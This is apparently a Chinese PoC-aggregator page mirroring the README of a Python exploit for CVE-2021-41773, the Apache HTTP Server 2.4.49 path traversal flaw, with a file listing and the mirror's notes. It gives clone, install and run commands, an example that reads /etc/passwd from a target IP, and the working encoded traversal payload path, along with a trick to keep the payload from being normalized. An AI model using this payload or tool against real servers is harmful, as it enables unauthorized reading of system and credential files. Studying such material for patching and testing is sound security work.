POC详情: ea1b8b4138d7b3214ba245e1881c5846f5f14b34

来源
https://github.com/blu3ming/PoC-CVE-2021-41773
关联漏洞
标题: Apache HTTP Server 路径遍历漏洞 (CVE-2021-41773)
描述:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 2.4.49版本存在路径遍历漏洞,攻击者可利用该漏洞使用路径遍历攻击将URL映射到预期文档根以外的文件。
描述
Python exploit for CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal vulnerability
介绍
# CVE-2021-41773 Apache HTTP Server Path Traversal Exploit

A Python exploit for CVE-2021-41773, a path traversal vulnerability in Apache HTTP Server 2.4.49 that allows reading arbitrary files from the server.

## Vulnerability Details

**CVE-2021-41773** is a path traversal vulnerability in Apache HTTP Server 2.4.49 that occurs due to improper validation of user-supplied paths. The vulnerability allows attackers to read files outside the document root by using URL-encoded path traversal sequences.

- **CVSS Score**: 7.5 (High)
- **Affected Versions**: Apache HTTP Server 2.4.49
- **Vector**: Remote, unauthenticated

## Installation

```bash
git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt
```

## Usage

```bash
python3 cve-2021-41773.py -t <target> -f <file_path>
```

### Parameters

- `-t, --target`: Target URL (include protocol and port if needed)
- `-f, --file`: File path to read from the server

### Example

```bash
# Read /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd
```

![Successful Exploit](success.png)

## How It Works

The exploit uses URL-encoded path traversal sequences (`.%2e/%2e%2e/`) to bypass Apache's path validation:

1. The vulnerable Apache version fails to properly decode and validate the path
2. URL-encoded dots (`.%2e`) bypass the initial security checks
3. The server processes the path traversal after decoding, allowing file access

The key is using `urllib3.PoolManager()` instead of `requests.get()` to prevent automatic URL normalization that would break the exploit.

## Technical Details

```python
# The exploit URL structure:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{target_file}
```

This translates to:
```
/cgi-bin/../../../../{target_file}
```

## References

- [CVE-2021-41773 - MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773)
- [Apache HTTP Server Security Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)
- [NVD - CVE-2021-41773](https://nvd.nist.gov/vuln/detail/CVE-2021-41773)
文件快照

 [4.0K]  /data/pocs/ea1b8b4138d7b3214ba245e1881c5846f5f14b34
├── [ 855]  cve-2021-41773.py
├── [2.0K]  README.md
├── [  32]  requirements.txt
└── [ 68K]  success.png

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。